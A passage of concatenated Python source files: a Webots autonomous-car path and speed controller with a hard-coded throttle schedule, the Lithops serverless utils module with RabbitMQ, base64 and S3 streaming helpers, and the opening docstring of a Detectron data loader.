target_throttle = [0.65, 0.65, 0.3, 0.0, 0.3, 0.3, 0.3, 0.3, -0.2, -0.4, -0.4, -0.4, -0.4, 0.85, 0.45, 0.45, 0.8, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, -0.2, -0.4, 0.95, 0.45, 0.5, 0.5, 0.9, 0.55, 0.0, 0.55, 0.95, 1.0, 0.65, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3]
target_t = [0.25, 0.49, 0.73, 0.97, 1.21, 1.45, 1.69, 1.93, 2.18, 2.44, 2.72, 3.03, 3.37, 3.72, 4.04, 4.35, 4.65, 4.94, 5.23, 5.52, 5.81, 6.1, 6.39, 6.68, 6.97, 7.27, 7.6, 7.93, 8.24, 8.54, 8.83, 9.11, 9.38, 9.65, 9.92, 10.18, 10.43, 10.68, 10.92, 11.16, 11.4, 11.64, 11.88, 12.12, 12.36, 12.6, 12.84, 13.08, 13.32, 13.56, 13.8, 14.04, 14.28, 14.52, 14.76, 15.0, 15.24, 15.48, 15.72, 15.96, 16.2, 16.44, 16.68, 16.92, 17.16, 17.4, 17.64, 17.88, 18.12, 18.36, 18.6, 18.84, 19.08, 19.32, 19.56, 19.8, 20.04, 20.28, 20.52]
exp_out = [[]]
time_index = 0
img_cnt = 1
data_dict = {}
inf = 1e9
def debug_print(print_str):
if DEBUG_MODE:
print(print_str)
sys.stdout.flush()
class PathAndSpeedFollower(BaseCarController):
"""PathAndSpeedFollower class is a car controller class for Webots."""
CAMERA_TO_FRONT_DISTANCE = 2.3 # 2.3 m is the distance from Prius top sensor location to the very front of the car
LIDAR_TO_FRONT_DISTANCE = 2.3
CAMERA_MAIN_RELATIVE_POSITION = [0.0, 1.3]
LIDAR_MAIN_RELATIVE_POSITION = [0.0, 1.3]
RADAR_FRONT_RELATIVE_POSITION = [0.0, 3.6]
FRONT_TO_REAR_WHEELS_DISTANCE = 3.6 # Approximate (this is intentially longer than the actual wheel base
# for smoother operation)
CAMERA_LOCAL_COORDINATES = [0.0, 1.3, 1.1]
CAMERA_X_ROT_ANGLE = -0.01
CAMERA_LOCAL_ROTATION = np.array([[1.0, 0.0, 0.0],
[0.0, math.cos(CAMERA_X_ROT_ANGLE), -math.sin(CAMERA_X_ROT_ANGLE)],
[0.0, math.sin(CAMERA_X_ROT_ANGLE), math.cos(CAMERA_X_ROT_ANGLE)]])
CAR_FRONT_TRIANGLE_LINE1_M = -192/126 # old value: -0.6 # Line 1 m for front triangle.
CAR_FRONT_TRIANGLE_LINE1_B = 1142.9 # Old value: 526 # Line 1 b for front triangle.
CAR_FRONT_TRIANGLE_LINE2_M = 192/126 # old value: 0.6 # Line 2 m for front triangle.
CAR_FRONT_TRIANGLE_LINE2_B = -758.9 # Old value: -202 # Line 2 b for front triangle.
PED_FRONT_TRIANGLE_LINE1_M = -192/204 # old value: -0.6 # Line 1 m for front triangle.
PED_FRONT_TRIANGLE_LINE1_B = 779.3 # Old value: 526 # Line 1 b for front triangle.
PED_FRONT_TRIANGLE_LINE2_M = 192/204 # old value: 0.6 # Line 2 m for front triangle.
PED_FRONT_TRIANGLE_LINE2_B = -395.3 # Old value: -202 # Line 2 b for front triangle.
CLASSIFIER_PERIOD_MS = 100
LIDAR_PERIOD_MS = 200
RADAR_PERIOD_MS = 200
MIN_EMERGENCY_BRAKE_DURATION_MS = 100.0
MEASURE_EXEC_TIME = False
LANE_WIDTH = 3.5
MIN_STEERING_MANEUVER_MS = 2000.0
EMERGENCY_STEERING_TTC = 1.0
OBJECT_TRACKER_MAX_DISTANCE = 70.0
def __init__(self, controller_parameters):
(car_model, target_speed_m_s, is_direct_speed_control, target_lat_pos, self_vhc_id, slow_at_intersection,
use_fusion) = controller_parameters
BaseCarController.__init__(self, car_model)
self.slow_at_intersection = slow_at_intersection in ('True', 'true', 'yes', 'Yes')
self.is_direct_speed_control = is_direct_speed_control in ('True', 'true', 'yes', 'Yes')
self.use_fusion = use_fusion in ('True', 'true', 'yes', 'Yes')
self.camera_device_name = 'camera'
self.camera = None
self.compass_device_name = 'compass'
self.compass = None
self.display_device_name = 'display'
self.display = None
self.camera_info_display = None
self.sensor_display_device_name = 'sensor_display'
self.sensor_display = None
self.sensor_info_display = None
self.gps_device_name = 'gps'
self.gps = None
self.receiver_device_name = 'receiver'
self.receiver = None
self.emitter_device_name = 'emitter'
self.emitter = None
self.lidar_main_device_name = 'velodyne' # ibeo', 'velodyne'
self.lidar_main = None
self.radar_front_device_name = 'radar'
self.radar_front = None
self.target_speed_m_s = float(target_speed_m_s)
self.classifier = None
self.classification_client = None
self.obj_tracker = None
self.ground_truth_generator = None
self.contr_comm = ControllerCommunicationInterface()
self.target_lat_pos = float(target_lat_pos)
self.target_bearing = 0.0
self.lateral_controller = GenericStanleyController()
self.lateral_controller.k = 0.5
self.lateral_controller.k2 = 0.4
self.lateral_controller.k3 = 1.1
self.lateral_controller.set_output_range(-0.8, 0.8)
self.longitudinal_controller = GenericPIDController(0.15, 0.01, 0.0)
self.longitudinal_controller.set_integrator_value_range(-20.0, 20.0)
self.self_vhc_id = int(self_vhc_id)
self.path_following_tools = PathFollowingTools()
self.self_sensor_fusion_tracker = None
self.last_segment_ind = 0
self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
self.last_segment_ind = 0
self.detour_start_time = None
self.target_speed_planner = TargetSpeedPlanner(default_speed=self.target_speed_m_s)
print('AutomatedDrivingControl Initialized: {}, {}'.format(car_model, self.target_speed_m_s))
def start_devices(self):
"""Start the devices on the car and initialize objects like classifier."""
# Start camera and the sensors:
self.camera = self.getCamera(self.camera_device_name)
if self.camera is not None:
self.camera.enable(self.CLASSIFIER_PERIOD_MS)
self.camera_info_display = CameraInfoDisplay(self.display)
self.gps = self.getGPS(self.gps_device_name)
if self.gps is not None:
self.gps.enable(WORLD_TIME_STEP_MS)
self.compass = self.getCompass(self.compass_device_name)
if self.compass is not None:
self.compass.enable(WORLD_TIME_STEP_MS)
self.receiver = self.getReceiver(self.receiver_device_name)
if self.receiver is not None:
self.receiver.enable(WORLD_TIME_STEP_MS)
self.emitter = self.getEmitter(self.emitter_device_name)
# Start the car engine
self.start_car()
def run(self):
"""Runs the controller."""
self.start_devices()
print("Devices Started.")
sys.stdout.flush()
def get_self_position():
"""Returns current self position."""
return self.self_current_state[0:2]
def get_self_speed_ms():
"""Returns current speed in m/s."""
return self.self_current_state[2]
def get_self_yaw_angle():
"""Returns self yaw angle in radians."""
return self.self_current_state[3]
# Internal functions to keep the code more readable:
def read_gps_sensor(gps_device):
"""Reads GPS sensor."""
if gps_device is not None:
sensor_gps_speed_m_s = gps_device.getSpeed()
sensor_gps_position_m = gps_device.getValues()
else:
sensor_gps_speed_m_s = 0.0
sensor_gps_position_m = [0.0, 0.0, 0.0]
return sensor_gps_position_m, sensor_gps_speed_m_s
def read_compass_sensor(compass_device):
"""Reads Compass Sensor."""
if compass_device is not None:
sensor_compass_bearing_rad = controller_commons.get_bearing(compass_device)
else:
sensor_compass_bearing_rad = 0.0
return sensor_compass_bearing_rad
def compute_and_apply_control():
"""Computes control output using the detected objects from sensor suite."""
cur_position = get_self_position()
cur_speed_ms = get_self_speed_ms()
cur_yaw_angle = get_self_yaw_angle()
# Compute control
if self.path_following_tools.target_path is not None:
# Compute distance from front wheels for smoother turns:
temp_cur_pos = [cur_position[0] - (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.sin(cur_yaw_angle) +
cur_speed_ms * 0.2 * math.sin(cur_yaw_angle)),
cur_position[1] + (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.cos(cur_yaw_angle) +
cur_speed_ms * 0.2 * math.cos(cur_yaw_angle))]
(current_segment_ind, line_segment_as_list, nearest_pos_on_path, dist_to_seg_end) = \
self.path_following_tools.get_current_segment(temp_cur_pos, self.last_segment_ind)
(distance_err, angle_err) = \
self.path_following_tools.get_distance_and_angle_error(temp_cur_pos,
cur_yaw_angle,
last_segment_ind=self.last_segment_ind,
is_detouring=False)
self.last_segment_ind = current_segment_ind
if len(self.path_following_tools.path_details) > current_segment_ind:
(next_turn_angle, travel_distance) = self.path_following_tools.path_details[current_segment_ind]
travel_distance += dist_to_seg_end
else:
(next_turn_angle, travel_distance) = (0.0, 0.0)
else:
current_segment_ind = -1
angle_err = self.target_bearing - cur_yaw_angle
while angle_err > math.pi:
angle_err -= 2*math.pi
while angle_err < -math.pi:
angle_err += 2*math.pi
distance_err = -(self.target_lat_pos - cur_position[0])
(next_turn_angle, travel_distance) = (0.0, 0.0)
current_target_speed = \
self.target_speed_planner.get_current_target_speed(cur_time_ms=cur_time_ms,
cur_segment_ind=current_segment_ind)
if self.slow_at_intersection and abs(next_turn_angle) > math.pi/60 and travel_distance < 100.0:
turn_ratio = min(1.0, abs(next_turn_angle)/(math.pi/4.0))
max_speed_limit = 10.0 + ((1.0 - turn_ratio)*30.0)
# decrease speed limit as we approach to the intersection.
max_speed_limit = (max_speed_limit + (current_target_speed - max_speed_limit) *
((max(travel_distance, 10.0)-10.0)/80.0))
else:
max_speed_limit = current_target_speed
control_steering = self.lateral_controller.compute(angle_err,
distance_err,
cur_speed_ms)
speed_ratio = min(1.0, self.self_current_state[2]/22.0)
max_steering = 0.1 + (1.0 - speed_ratio)*0.7
control_steering = min(max(-max_steering, control_steering), max_steering)
if self.is_direct_speed_control:
# self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(10.0), angle=control_steering)
'''
v = 0.1
t = 0.3
global t1, v1, flag
if cur_time_ms==100:
self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(v), angle=control_steering)
elif cur_time_ms>=5000:
self.set_throttle(t)
# if cur_time_ms%200==0:
# print("time: "+str(cur_time_ms)+" vel: "+str(cur_speed_ms))
if abs(round(cur_speed_ms,0)-cur_speed_ms)<0.01:
t1 = cur_time_ms
v1 = cur_speed_ms
# print ("--> "+str(t1))
if cur_time_ms-t1 in (100,200,300,400,500,600,700,800,900,1000):
a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
# print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
'''
# if cur_time_ms-t1 == 1000:
# a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
# print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
if cur_time_ms<5010:
x = 20.0
self.set_target_speed_and_angle(speed= controller_commons.speed_ms_to_kmh(x) ,angle=control_steering)
else:
global time_index
if(target_t[time_index] < ((cur_time_ms/1000.0) -5) ):
time_index = time_index + 1
# x2 = exp_out[time_index][0]
# y2 = exp_out[time_index][1]
inc = 0.0
# if(time_index>0):
# t1 = exp_out[time_index-1][4]
# dt = cur_time_ms/1000.0 - 3 - t1
# x1 = exp_out[time_index-1][0]
# u1 = exp_out[time_index-1][3]
# a2 = exp_out[time_index][2]
# dx = u1*dt + 0.5*a2*dt*dt
# if(abs(x2-x1)==5.0):
# if( (dx-0.5)/abs(x2-x1)>(cur_position[1]-x1)/(x2-x1) ):
# inc = 0.05
# elif( (dx+0.5)/abs(x2-x1)<(cur_position[1]-x1)/(x2-x1) ):
# inc = -0.05
# else:
# inc = 0.0
# if(target_throttle[time_index])
self.set_throttle_and_steering_angle(target_throttle[time_index]+inc, control_steering)
# if cur_time_ms%100==0:
# global img_cnt
# img_name = "img_"+str(img_cnt)+".png"
# self.camera.saveImage("../../../images/"+img_name,1)
# img_cnt = img_cnt + 1
# data_dict[img_name] = [cur_speed_ms,target_throttle[time_index],control_steering]
# self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(min(max_speed_limit,
# current_target_speed)),
# angle=control_steering)
if cur_time_ms%500==0:
print("Time: "+str(cur_time_ms)+" Agent vehicle speed: "+str(cur_speed_ms) + " pos: "+str(cur_position))
else:
control_throttle = self.longitudinal_controller.compute(min(max_speed_limit, current_target_speed)
- cur_speed_ms)
self.set_throttle_and_steering_angle(control_throttle, control_steering)
if current_target_speed < 0.0:
# Emergency / sudden braking
self.set_brake(1.0)
self.set_throttle(0.0)
while self.step() >= 0:
sim_time = self.get_sim_time()
cur_time_ms = int(round(1000 * sim_time))
# -------------- Read Sensors----------------
# ************ Read GPS ************
(sensor_gps_position_m, sensor_gps_speed_m_s) = read_gps_sensor(self.gps)
# ************ Read Compass ************
sensor_compass_bearing_rad = read_compass_sensor(self.compass)
# -------------- Sensor Fusion ----------------
# ************ Sensor Fusion for own states (GPS + Compass) ************
if self.self_sensor_fusion_tracker is None:
self.self_current_state = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
sensor_compass_bearing_rad, 0.0]
if sensor_gps_speed_m_s > 50.0 or sensor_gps_speed_m_s < -20.0: # Filter out errors in read gps speed
sensor_gps_speed_m_s = 0.0
self.self_current_state[2] = sensor_gps_speed_m_s
if self.use_fusion:
# Initiate self sensor fusion tracker
self.self_sensor_fusion_tracker = SensorFusionTracker(initial_state_mean=self.self_current_state,
filter_type='ukf')
else:
if self.gps is not None and self.compass is not None:
measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
sensor_compass_bearing_rad]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS_COMPASS)
elif self.gps is not None:
measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS)
elif self.compass is not None:
measurement = [sensor_compass_bearing_rad]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_COMPASS)
else:
self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
# Read sensor-like information from Simulation Supervisor
if self.receiver is not None:
messages = self.contr_comm.receive_all_communication(self.receiver)
command_list = self.contr_comm.extract_all_commands_from_message(messages)
path_modified = False
for command_item in command_list:
command = command_item[0]
if command == ControllerCommunicationInterface.SET_CONTROLLER_PARAMETERS_MESSAGE:
parameter = command_item[1]
if parameter.get_vehicle_id() == self.self_vhc_id:
if parameter.get_parameter_name() == 'target_position':
parameter_data = parameter.get_parameter_data()
# print(parameter_data)
self.path_following_tools.add_point_to_path(parameter_data)
path_modified = True
elif parameter.get_parameter_name() == 'target_speed_at_time':
# 1st parameter is the start time for the target speed in seconds as float.
# 2nd: how long will the target speed be active in seconds -1 for infinite/until next.
# 3rd parameter is the target speed.
parameter_data = parameter.get_parameter_data()
if parameter_data[1] < 0:
target_length = math.inf
else:
target_length = int(round(1000 * parameter_data[1]))
self.target_speed_planner.add_target_speed_data(
TargetSpeedData(event_type='time',
start_time=int(round(1000 * parameter_data[0])),
length=target_length,
target_speed=parameter_data[2]))
elif parameter.get_parameter_name() == 'target_speed_at_segment':
# 1st parameter is the start segment index for the target speed.
# 2nd: how long will the target speed be active in seconds:
# -1 for infinite/until next, 0 for during the segment
# 3rd parameter is the target speed.
parameter_data = parameter.get_parameter_data()
if parameter_data[1] < 0:
target_length = -1
else:
target_length = int(round(1000 * parameter_data[1]))
self.target_speed_planner.add_target_speed_data(
TargetSpeedData(event_type='segment',
start_time=int(round(parameter_data[0])),
length=target_length,
target_speed=parameter_data[2]))
if path_modified:
self.path_following_tools.smoothen_the_path()
self.path_following_tools.populate_the_path_with_details()
# print(self.path_following_tools.target_path)
#----------Dynamic Path computation starts-------------------------
'''
if(cur_time_ms == 10):
cur_position = get_self_position()
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
global suboptimalPath
if (cur_time_ms == 8000):
t1.join()
self.path_following_tools.target_path = None
self.path_following_tools.path_details = None
for pt in suboptimalPath:
self.path_following_tools.add_point_to_path(pt)
self.path_following_tools.smoothen_the_path()
self.path_following_tools.populate_the_path_with_details()
cur_position = suboptimalPath[-1]
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
elif (cur_time_ms % 8000 == 0):
t1.join()
# print(suboptimalPath)
# cur_position = get_self_position()
# (cur_seg,line_seg,nearest_pos,dis) = self.path_following_tools.get_current_segment(cur_position,0,self.path_following_tools.target_path)
self.path_following_tools.target_path = self.path_following_tools.future_target_path
self.path_following_tools.path_details = self.path_following_tools.future_path_details
cur_position = suboptimalPath[-1]
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
'''
#---------Dynamic Path computation end--------------------
compute_and_apply_control()
out_file = "../../../control_throttle.pkl"
with open(out_file, 'wb') as handle:
pickle.dump(data_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
# Clean up
del self.classifier
del self.obj_tracker
print("Bye!")
sys.stdout.flush()
|
utils.py
|
#
# Copyright 2018 PyWren Team
# (C) Copyright IBM Corp. 2020
# (C) Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import io
import re
import os
import sys
import pika
import uuid
import json
import base64
import inspect
import struct
import lithops
import zipfile
import platform
import logging.config
import threading
from lithops.storage.utils import create_job_key
from lithops.constants import LOGGER_FORMAT, LOGGER_LEVEL
logger = logging.getLogger(__name__)
def uuid_str():
return str(uuid.uuid4())
def create_executor_id(lenght=6):
""" Creates an executor ID. """
if '__LITHOPS_SESSION_ID' in os.environ:
session_id = os.environ['__LITHOPS_SESSION_ID']
else:
session_id = uuid_str().replace('/', '')[:lenght]
os.environ['__LITHOPS_SESSION_ID'] = session_id
if '__LITHOPS_TOTAL_EXECUTORS' in os.environ:
exec_num = int(os.environ['__LITHOPS_TOTAL_EXECUTORS']) + 1
else:
exec_num = 0
os.environ['__LITHOPS_TOTAL_EXECUTORS'] = str(exec_num)
return '{}-{}'.format(session_id, exec_num)
def get_executor_id():
""" retrieves the current executor ID. """
session_id = os.environ['__LITHOPS_SESSION_ID']
exec_num = os.environ['__LITHOPS_TOTAL_EXECUTORS']
return '{}-{}'.format(session_id, exec_num)
def create_rabbitmq_resources(rabbit_amqp_url, executor_id, job_id):
"""
Creates RabbitMQ queues and exchanges of a given job in a thread.
Called when a job is created.
"""
logger.debug('ExecutorID {} | JobID {} - Creating RabbitMQ resources'.format(executor_id, job_id))
def create_resources(rabbit_amqp_url, executor_id, job_id):
job_key = create_job_key(executor_id, job_id)
exchange = 'lithops-{}'.format(job_key)
queue_0 = '{}-0'.format(exchange) # For waiting
queue_1 = '{}-1'.format(exchange) # For invoker
params = pika.URLParameters(rabbit_amqp_url)
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.exchange_declare(exchange=exchange, exchange_type='fanout', auto_delete=True)
channel.queue_declare(queue=queue_0, auto_delete=True)
channel.queue_bind(exchange=exchange, queue=queue_0)
channel.queue_declare(queue=queue_1, auto_delete=True)
channel.queue_bind(exchange=exchange, queue=queue_1)
connection.close()
th = threading.Thread(target=create_resources, args=(rabbit_amqp_url, executor_id, job_id))
th.daemon = True
th.start()
def delete_rabbitmq_resources(rabbit_amqp_url, executor_id, job_id):
"""
Deletes RabbitMQ queues and exchanges of a given job.
Only called when an exception is produced, otherwise resources are
automatically deleted.
"""
job_key = create_job_key(executor_id, job_id)
exchange = 'lithops-{}'.format(job_key)
queue_0 = '{}-0'.format(exchange) # For waiting
queue_1 = '{}-1'.format(exchange) # For invoker
params = pika.URLParameters(rabbit_amqp_url)
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.queue_delete(queue=queue_0)
channel.queue_delete(queue=queue_1)
channel.exchange_delete(exchange=exchange)
connection.close()
def agg_data(data_strs):
"""Auxiliary function that aggregates data of a job to a single
byte string.
"""
ranges = []
pos = 0
for datum in data_strs:
datum_len = len(datum)
ranges.append((pos, pos+datum_len-1))
pos += datum_len
return b"".join(data_strs), ranges
def setup_logger(logging_level=LOGGER_LEVEL,
stream=None,
logging_format=LOGGER_FORMAT):
"""Setup default logging for lithops."""
if stream is None:
stream = sys.stderr
if type(logging_level) is str:
logging_level = logging.getLevelName(logging_level.upper())
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': logging_format
},
},
'handlers': {
'default': {
'level': logging_level,
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': stream
},
},
'loggers': {
'lithops': {
'handlers': ['default'],
'level': logging_level,
'propagate': False
},
}
})
def create_handler_zip(dst_zip_location, entry_point_file, entry_point_name=None):
"""Create the zip package that is uploaded as a function"""
logger.debug("Creating function handler zip in {}".format(dst_zip_location))
def add_folder_to_zip(zip_file, full_dir_path, sub_dir=''):
for file in os.listdir(full_dir_path):
full_path = os.path.join(full_dir_path, file)
if os.path.isfile(full_path):
zip_file.write(full_path, os.path.join('lithops', sub_dir, file))
elif os.path.isdir(full_path) and '__pycache__' not in full_path:
add_folder_to_zip(zip_file, full_path, os.path.join(sub_dir, file))
try:
with zipfile.ZipFile(dst_zip_location, 'w', zipfile.ZIP_DEFLATED) as lithops_zip:
module_location = os.path.dirname(os.path.abspath(lithops.__file__))
entry_point_name = entry_point_name or os.path.basename(entry_point_file)
lithops_zip.write(entry_point_file, entry_point_name)
add_folder_to_zip(lithops_zip, module_location)
except Exception:
raise Exception('Unable to create the {} package: {}'.format(dst_zip_location))
def verify_runtime_name(runtime_name):
"""Check if the runtime name has a correct formating"""
assert re.match("^[A-Za-z0-9_/.:-]*$", runtime_name),\
'Runtime name "{}" not valid'.format(runtime_name)
def timeout_handler(error_msg, signum, frame):
raise TimeoutError(error_msg)
def version_str(version_info):
"""Format the python version information"""
return "{}.{}".format(version_info[0], version_info[1])
def is_unix_system():
"""Check if the current OS is UNIX"""
curret_system = platform.system()
return curret_system != 'Windows'
def is_lithops_worker():
"""
Checks if the current execution is within a lithops worker
"""
if 'LITHOPS_WORKER' in os.environ:
return True
return False
def is_object_processing_function(map_function):
func_sig = inspect.signature(map_function)
return {'obj', 'url'} & set(func_sig.parameters)
def is_notebook():
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
except NameError:
return False # Probably standard Python interpreter
def convert_bools_to_string(extra_env):
"""
Converts all booleans of a dictionary to a string
"""
for key in extra_env:
if type(extra_env[key]) == bool:
extra_env[key] = str(extra_env[key])
return extra_env
def sizeof_fmt(num, suffix='B'):
for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Yi', suffix)
def sdb_to_dict(item):
attr = item['Attributes']
return {c['Name']: c['Value'] for c in attr}
def dict_to_b64str(the_dict):
bytes_dict = json.dumps(the_dict).encode()
b64_dict = base64.urlsafe_b64encode(bytes_dict)
return b64_dict.decode()
def b64str_to_dict(str_data):
b64_dict = base64.urlsafe_b64decode(str_data.encode())
bytes_dict = json.loads(b64_dict)
return bytes_dict
def bytes_to_b64str(byte_data):
byte_data_64 = base64.b64encode(byte_data)
byte_data_64_ascii = byte_data_64.decode('ascii')
return byte_data_64_ascii
def b64str_to_bytes(str_data):
str_ascii = str_data.encode('ascii')
byte_data = base64.b64decode(str_ascii)
return byte_data
def split_object_url(obj_url):
if '://' in obj_url:
sb, path = obj_url.split('://')
else:
sb = None
path = obj_url
sb = 'ibm_cos' if sb == 'cos' else sb
sb = 'aws_s3' if sb == 's3' else sb
bucket, full_key = path.split('/', 1) if '/' in path else (path, '')
if full_key.endswith('/'):
prefix = full_key.replace('/', '')
obj_name = ''
elif full_key:
prefix, obj_name = full_key.rsplit('/', 1) if '/' in full_key else ('', full_key)
else:
prefix = ''
obj_name = ''
return sb, bucket, prefix, obj_name
def split_path(path):
if (path.startswith("/")):
path = path[1:]
ind = path.find("/")
if (ind > 0):
bucket_name = path[:ind]
key = path[ind + 1:]
else:
bucket_name = path
key = None
return bucket_name, key
def format_data(iterdata, extra_args):
"""
Converts iteradata to a list with extra_args
"""
# Format iterdata in a proper way
if type(iterdata) in [range, set]:
data = list(iterdata)
elif type(iterdata) != list:
data = [iterdata]
else:
data = iterdata
if extra_args:
new_iterdata = []
for data_i in data:
if type(data_i) is tuple:
# multiple args
if type(extra_args) is not tuple:
raise Exception('extra_args must contain args in a tuple')
new_iterdata.append(data_i + extra_args)
elif type(data_i) is dict:
# kwargs
if type(extra_args) is not dict:
raise Exception('extra_args must contain kwargs in a dictionary')
data_i.update(extra_args)
new_iterdata.append(data_i)
else:
new_iterdata.append((data_i, *extra_args))
data = new_iterdata
return data
def verify_args(func, iterdata, extra_args):
data = format_data(iterdata, extra_args)
# Verify parameters
non_verify_args = ['ibm_cos', 'swift', 'storage', 'id', 'rabbitmq']
func_sig = inspect.signature(func)
new_parameters = list()
for param in func_sig.parameters:
if param not in non_verify_args:
new_parameters.append(func_sig.parameters[param])
new_func_sig = func_sig.replace(parameters=new_parameters)
new_data = list()
for elem in data:
if type(elem) == dict:
if set(list(new_func_sig.parameters.keys())) <= set(elem):
new_data.append(elem)
else:
raise ValueError("Check the args names in the data. "
"You provided these args: {}, and "
"the args must be: {}".format(list(elem.keys()),
list(new_func_sig.parameters.keys())))
elif type(elem) in (list, tuple) and len(elem) == len(new_func_sig.parameters):
new_elem = dict(new_func_sig.bind(*list(elem)).arguments)
new_data.append(new_elem)
else:
# single value (string, integer, etc)
new_elem = dict(new_func_sig.bind(elem).arguments)
new_data.append(new_elem)
return new_data
class WrappedStreamingBody:
"""
Wrap boto3's StreamingBody object to provide enough Python fileobj functionality,
and to discard data added by partitioner and cut lines.
from https://gist.github.com/debedb/2e5cbeb54e43f031eaf0
"""
def __init__(self, sb, size):
# The StreamingBody we're wrapping
self.sb = sb
# Initial position
self.pos = 0
# Size of the object
self.size = size
def tell(self):
# print("In tell()")
return self.pos
def read(self, n=None):
retval = self.sb.read(n)
if retval == "":
raise EOFError()
self.pos += len(retval)
return retval
def readline(self):
try:
retval = self.sb.readline()
except struct.error:
raise EOFError()
self.pos += len(retval)
return retval
def seek(self, offset, whence=0):
# print("Calling seek()")
retval = self.pos
if whence == 2:
if offset == 0:
retval = self.size
else:
raise Exception("Unsupported")
else:
if whence == 1:
offset = self.pos + offset
if offset > self.size:
retval = self.size
else:
retval = offset
# print("In seek(%s, %s): %s, size is %s" % (offset, whence, retval, self.size))
self.pos = retval
return retval
def __str__(self):
return "WrappedBody"
def __getattr__(self, attr):
# print("Calling %s" % attr)
if attr == 'tell':
return self.tell
elif attr == 'seek':
return self.seek
elif attr == 'read':
return self.read
elif attr == 'readline':
return self.readline
elif attr == '__str__':
return self.__str__
else:
return getattr(self.sb, attr)
class WrappedStreamingBodyPartition(WrappedStreamingBody):
def __init__(self, sb, size, byterange):
super().__init__(sb, size)
# Chunk size
self.chunk_size = size
# Range of the chunk
self.range = byterange
# The first chunk does not contain plusbyte
self.plusbytes = 0 if not self.range or self.range[0] == 0 else 1
# To store the first byte of this chunk, which actually is the last byte of previous chunk
self.first_byte = None
# Flag that indicates the end of the file
self.eof = False
def read(self, n=None):
if self.eof:
raise EOFError()
# Data always contain one byte from the previous chunk,
# so l'ets check if it is a \n or not
if self.plusbytes != 0:
self.first_byte = self.sb.read(self.plusbytes)
retval = self.sb.read(n)
if retval == "":
raise EOFError()
self.pos += len(retval)
first_row_start_pos = 0
if self.first_byte != b'\n' and self.plusbytes == 1:
logger.info('Discarding first partial row')
# Previous byte is not \n
# This means that we have to discard first row because it is cut
first_row_start_pos = retval.find(b'\n')+1
last_row_end_pos = self.pos
# Find end of the line in threshold
if self.pos > self.chunk_size:
buf = io.BytesIO(retval[self.chunk_size-self.plusbytes:])
buf.readline()
last_row_end_pos = self.chunk_size-self.plusbytes+buf.tell()
self.eof = True
return retval[first_row_start_pos:last_row_end_pos]
def readline(self):
if self.eof:
raise EOFError()
if not self.first_byte and self.plusbytes != 0:
self.first_byte = self.sb.read(self.plusbytes)
if self.first_byte != b'\n':
logger.debug('Discarding first partial row')
self.sb._raw_stream.readline()
try:
retval = self.sb._raw_stream.readline()
except struct.error:
raise EOFError()
self.pos += len(retval)
if self.pos >= self.chunk_size:
self.eof = True
return retval
|
loader.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
"""Detectron data loader. The design is generic and abstracted away from any
details of the minibatch. A minibatch is a dictionary of blob name keys and
their associated numpy (float32 or int32) ndarray values.
Outline of the data loader design:
loader thread\
loader thread \ / GPU 1 enqueue thread -> feed -> EnqueueOp
... -> minibatch queue -> ...
loader thread / \ GPU N enqueue thread -> feed -> EnqueueOp
loader thread/
<---------------------------- CPU -----------------------------|---- GPU ---->
A pool of loader threads construct minibatches that are put onto the shared
